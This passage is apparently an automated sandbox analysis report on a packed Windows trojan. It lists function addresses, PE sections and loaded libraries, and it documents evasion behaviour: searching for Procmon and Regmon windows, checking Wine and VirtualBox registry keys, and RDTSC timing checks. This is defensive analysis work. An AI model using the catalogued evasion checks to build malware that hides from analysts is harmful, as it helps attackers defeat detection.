      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_00179BD80_2_00179BD8
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_0018BBC90_2_0018BBC9
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_00169BF90_2_00169BF9
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_00148BED0_2_00148BED
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_00113C100_2_00113C10
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_001C7C150_2_001C7C15
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_00178C010_2_00178C01
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_0018CC000_2_0018CC00
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_00153C0B0_2_00153C0B
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_00180C320_2_00180C32
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_00155C230_2_00155C23
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_00158C500_2_00158C50
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_00197C530_2_00197C53
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_0015DC710_2_0015DC71
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_001ADC620_2_001ADC62
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_00166C690_2_00166C69
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_00164C9A0_2_00164C9A
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_001A9C8E0_2_001A9C8E
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_001ABCBA0_2_001ABCBA
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_001C4CB10_2_001C4CB1
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_000F4CA00_2_000F4CA0
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_00160CAF0_2_00160CAF
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_0016DCC70_2_0016DCC7
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_00111CF00_2_00111CF0
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_0017FCF60_2_0017FCF6
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_001B2CFF0_2_001B2CFF
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_002A7CC10_2_002A7CC1
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_001B9CEB0_2_001B9CEB
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_0016FCED0_2_0016FCED
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_00101D000_2_00101D00
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_0017CD020_2_0017CD02
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_00119D300_2_00119D30
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_000F1D2B0_2_000F1D2B
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_00182D3E0_2_00182D3E
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_00120D200_2_00120D20
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_0019AD2B0_2_0019AD2B
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_001B5D2C0_2_001B5D2C
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_0019FD220_2_0019FD22
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_00106D2E0_2_00106D2E
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_0014ED5D0_2_0014ED5D
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_00165D5F0_2_00165D5F
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_0010CD5E0_2_0010CD5E
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_001C6D530_2_001C6D53
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_00193D4A0_2_00193D4A
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_001B0D4D0_2_001B0D4D
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_0010CD4C0_2_0010CD4C
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_0011FD700_2_0011FD70
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_00156D7A0_2_00156D7A
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_0014ADB40_2_0014ADB4
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_00168DB60_2_00168DB6
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_001BBDB40_2_001BBDB4
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_00143DA50_2_00143DA5
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_001A4DAB0_2_001A4DAB
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_00117DA90_2_00117DA9
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_002ACDEF0_2_002ACDEF
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_00157DDD0_2_00157DDD
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_00173DF70_2_00173DF7
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_0011CDF00_2_0011CDF0
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_001A8E1B0_2_001A8E1B
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_0015CE160_2_0015CE16
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_00189E1B0_2_00189E1B
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_00178E180_2_00178E18
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_0011FE000_2_0011FE00
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_00150E0B0_2_00150E0B
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_0015EE2F0_2_0015EE2F
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_001B3E270_2_001B3E27
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_00159E5D0_2_00159E5D
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_000ECE450_2_000ECE45
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_001C2E4F0_2_001C2E4F
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_00175E400_2_00175E40
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_00140E4A0_2_00140E4A
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_0010FE740_2_0010FE74
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_00190E7F0_2_00190E7F
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_00160E670_2_00160E67
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_0010EE630_2_0010EE63
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_00100E6C0_2_00100E6C
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_00102E6D0_2_00102E6D
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_0019EE9A0_2_0019EE9A
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_001A0E9E0_2_001A0E9E
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_00146EB10_2_00146EB1
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_0014BEBC0_2_0014BEBC
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_001BFEAB0_2_001BFEAB
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_00118EA00_2_00118EA0
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_001A7EA30_2_001A7EA3
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_000E2EB00_2_000E2EB0
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_000FAEB00_2_000FAEB0
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_001B0EC90_2_001B0EC9
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_001BDEC80_2_001BDEC8
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_001B5EC50_2_001B5EC5
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_0014CEF00_2_0014CEF0
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_0018DEFD0_2_0018DEFD
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_001B7F1B0_2_001B7F1B
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_001A1F1B0_2_001A1F1B
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_001C8F1A0_2_001C8F1A
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_00105F1B0_2_00105F1B
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_0016BF1A0_2_0016BF1A
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_00142F030_2_00142F03
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_00144F030_2_00144F03
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_0014FF380_2_0014FF38
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_00171F5E0_2_00171F5E
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_00181F530_2_00181F53
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_00197F400_2_00197F40
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_001AAF410_2_001AAF41
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_001B6F400_2_001B6F40
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_000F6F520_2_000F6F52
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_000FDF500_2_000FDF50
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_00198F6F0_2_00198F6F
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_0016AF6C0_2_0016AF6C
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_001AFF9B0_2_001AFF9B
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_00170F9D0_2_00170F9D
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_0019CF930_2_0019CF93
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_0019BF940_2_0019BF94
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_00179F860_2_00179F86
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_0018CF8C0_2_0018CF8C
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_001A3FB80_2_001A3FB8
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_00176FA40_2_00176FA4
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_00180FDD0_2_00180FDD
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_00167FC80_2_00167FC8
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_00184FF70_2_00184FF7
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_0015AFE30_2_0015AFE3
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_00164FEF0_2_00164FEF
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_00199FE70_2_00199FE7
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: String function: 000F4C90 appears 77 times
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: String function: 000E7F60 appears 40 times
      Source: PH1D3KHmOD.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
      Source: PH1D3KHmOD.exeStatic PE information: Section: ZLIB complexity 0.9992659824346405
      Source: PH1D3KHmOD.exeStatic PE information: Section: rlrmwtje ZLIB complexity 0.9950118921775899
      Source: classification engineClassification label: mal100.troj.evad.winEXE@1/0@1/1
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_00112070 CoCreateInstance,0_2_00112070
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: PH1D3KHmOD.exeVirustotal: Detection: 56%
      Source: PH1D3KHmOD.exeReversingLabs: Detection: 60%
      Source: PH1D3KHmOD.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeFile read: C:\Users\user\Desktop\PH1D3KHmOD.exeJump to behavior
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeSection loaded: winmm.dllJump to behavior
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeSection loaded: webio.dllJump to behavior
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeSection loaded: mswsock.dllJump to behavior
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeSection loaded: winnsi.dllJump to behavior
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeSection loaded: dnsapi.dllJump to behavior
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeSection loaded: rasadhlp.dllJump to behavior
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeSection loaded: fwpuclnt.dllJump to behavior
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeSection loaded: schannel.dllJump to behavior
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeSection loaded: mskeyprotect.dllJump to behavior
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeSection loaded: ntasn1.dllJump to behavior
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeSection loaded: ncrypt.dllJump to behavior
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeSection loaded: ncryptsslp.dllJump to behavior
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeSection loaded: dpapi.dllJump to behavior
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: PH1D3KHmOD.exeStatic file information: File size 1867776 > 1048576
      Source: PH1D3KHmOD.exeStatic PE information: Raw size of rlrmwtje is bigger than: 0x100000 < 0x19de00

      Data Obfuscation

      barindex
      Detected unpacking (changes PE section rights)
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeUnpacked PE file: 0.2.PH1D3KHmOD.exe.e0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;rlrmwtje:EW;txntjrfm:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;rlrmwtje:EW;txntjrfm:EW;.taggant:EW;
      Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
      Source: PH1D3KHmOD.exeStatic PE information: real checksum: 0x1d6a97 should be: 0x1d7b7d
      Source: PH1D3KHmOD.exeStatic PE information: section name:
      Source: PH1D3KHmOD.exeStatic PE information: section name: .idata
      Source: PH1D3KHmOD.exeStatic PE information: section name:
      Source: PH1D3KHmOD.exeStatic PE information: section name: rlrmwtje
      Source: PH1D3KHmOD.exeStatic PE information: section name: txntjrfm
      Source: PH1D3KHmOD.exeStatic PE information: section name: .taggant
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_001390C2 push 2450D060h; mov dword ptr [esp], ebx0_2_0013A2A8
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_001390C2 push ecx; mov dword ptr [esp], eax0_2_0013A2C0
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_00139018 push 6DF6CFDAh; mov dword ptr [esp], ebx0_2_0013938D
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_002DD03C push 6BB01807h; mov dword ptr [esp], eax0_2_002DD0AC
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_0039501E push edx; mov dword ptr [esp], eax0_2_00395039
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_0013803F push 6DF6CFDAh; mov dword ptr [esp], ebx0_2_0013938D
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_0013803F push 2450D060h; mov dword ptr [esp], ebx0_2_0013A2A8
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_0013803F push ecx; mov dword ptr [esp], eax0_2_0013A2C0
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_0018F02B push ebp; mov dword ptr [esp], edi0_2_0018F3A9
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_0018F02B push 39CC545Fh; mov dword ptr [esp], edx0_2_0018F3B8
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_0018F02B push eax; mov dword ptr [esp], 2B5ED0E6h0_2_0018F3C6
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_0018F02B push esi; mov dword ptr [esp], 7CFB835Bh0_2_0018F49A
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_0018F02B push ecx; mov dword ptr [esp], eax0_2_0018F515
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_0018F02B push ebx; mov dword ptr [esp], 390230A4h0_2_0018F527
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_0018F02B push ebp; mov dword ptr [esp], 7FDD682Eh0_2_0018F54E
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_0018F02B push edx; mov dword ptr [esp], 7C747300h0_2_0018F5B7
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_0013C042 push 4D74ECC3h; mov dword ptr [esp], esi0_2_0013C048
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_00140041 push 011C0003h; mov dword ptr [esp], ebx0_2_001400A5
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_001E9075 push edi; mov dword ptr [esp], ecx0_2_001E90B8
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_0033405E push ebx; mov dword ptr [esp], edx0_2_00334097
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_0033105E push edi; mov dword ptr [esp], 5BCBAF40h0_2_0033109D
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_0033105E push ecx; mov dword ptr [esp], edi0_2_003310FF
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_0013C061 push 74EB57CCh; mov dword ptr [esp], ecx0_2_0013F946
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_0013C061 push ebx; mov dword ptr [esp], edi0_2_0013FAB3
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_0013C061 push eax; mov dword ptr [esp], 7EF2DE5Bh0_2_0013FAB7
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_00139066 push ebx; mov dword ptr [esp], ebp0_2_0013906A
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_00139066 push esi; mov dword ptr [esp], 07FF7CE5h0_2_00139EC9
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_0013D065 push 35BCC8C0h; mov dword ptr [esp], ebx0_2_0013D882
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_00117069 push es; retf 0_2_00117074
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_0013706E push 06630F06h; mov dword ptr [esp], ebp0_2_00137077
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_00139087 push 46C483C9h; mov dword ptr [esp], edi0_2_00139281
      Source: PH1D3KHmOD.exeStatic PE information: section name: entropy: 7.968015840636174
      Source: PH1D3KHmOD.exeStatic PE information: section name: rlrmwtje entropy: 7.954785719367017

      Boot Survival

      barindex
      Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeWindow searched: window name: FilemonClassJump to behavior
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeWindow searched: window name: RegmonClassJump to behavior
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeWindow searched: window name: FilemonClassJump to behavior
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeWindow searched: window name: RegmonclassJump to behavior

      Malware Analysis System Evasion

      barindex
      Tries to detect sandboxes / dynamic malware analysis system (registry check)
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
      Tries to detect virtualization through RDTSC time measurements
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 138F64 second address: 138F6E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007F8CACC719E6h 0x0000000a rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 138F6E second address: 138F72 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 2B3785 second address: 2B37BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jno 00007F8CACC719EAh 0x0000000b push ebx 0x0000000c jmp 00007F8CACC719F6h 0x00000011 pop ebx 0x00000012 popad 0x00000013 pushad 0x00000014 pushad 0x00000015 pushad 0x00000016 popad 0x00000017 je 00007F8CACC719E6h 0x0000001d push edi 0x0000001e pop edi 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 2B37BB second address: 2B37EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 ja 00007F8CACB12CCEh 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e jc 00007F8CACB12CB6h 0x00000014 pushad 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 2A5BA8 second address: 2A5BB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 2A5BB1 second address: 2A5BB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 2A5BB5 second address: 2A5BE3 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F8CACC719E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F8CACC719EAh 0x00000011 jmp 00007F8CACC719F8h 0x00000016 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 2A5BE3 second address: 2A5C1C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F8CACB12CBBh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jnc 00007F8CACB12CBCh 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F8CACB12CC7h 0x0000001b rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 2A5C1C second address: 2A5C20 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 2A5C20 second address: 2A5C26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 2A5C26 second address: 2A5C2B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 2A5C2B second address: 2A5C37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F8CACB12CB6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 2B27CB second address: 2B27D3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 2B27D3 second address: 2B27D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 2B27D7 second address: 2B27ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007F8CACC719ECh 0x0000000f rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 2B2BE9 second address: 2B2BED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 2B2BED second address: 2B2BF3 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
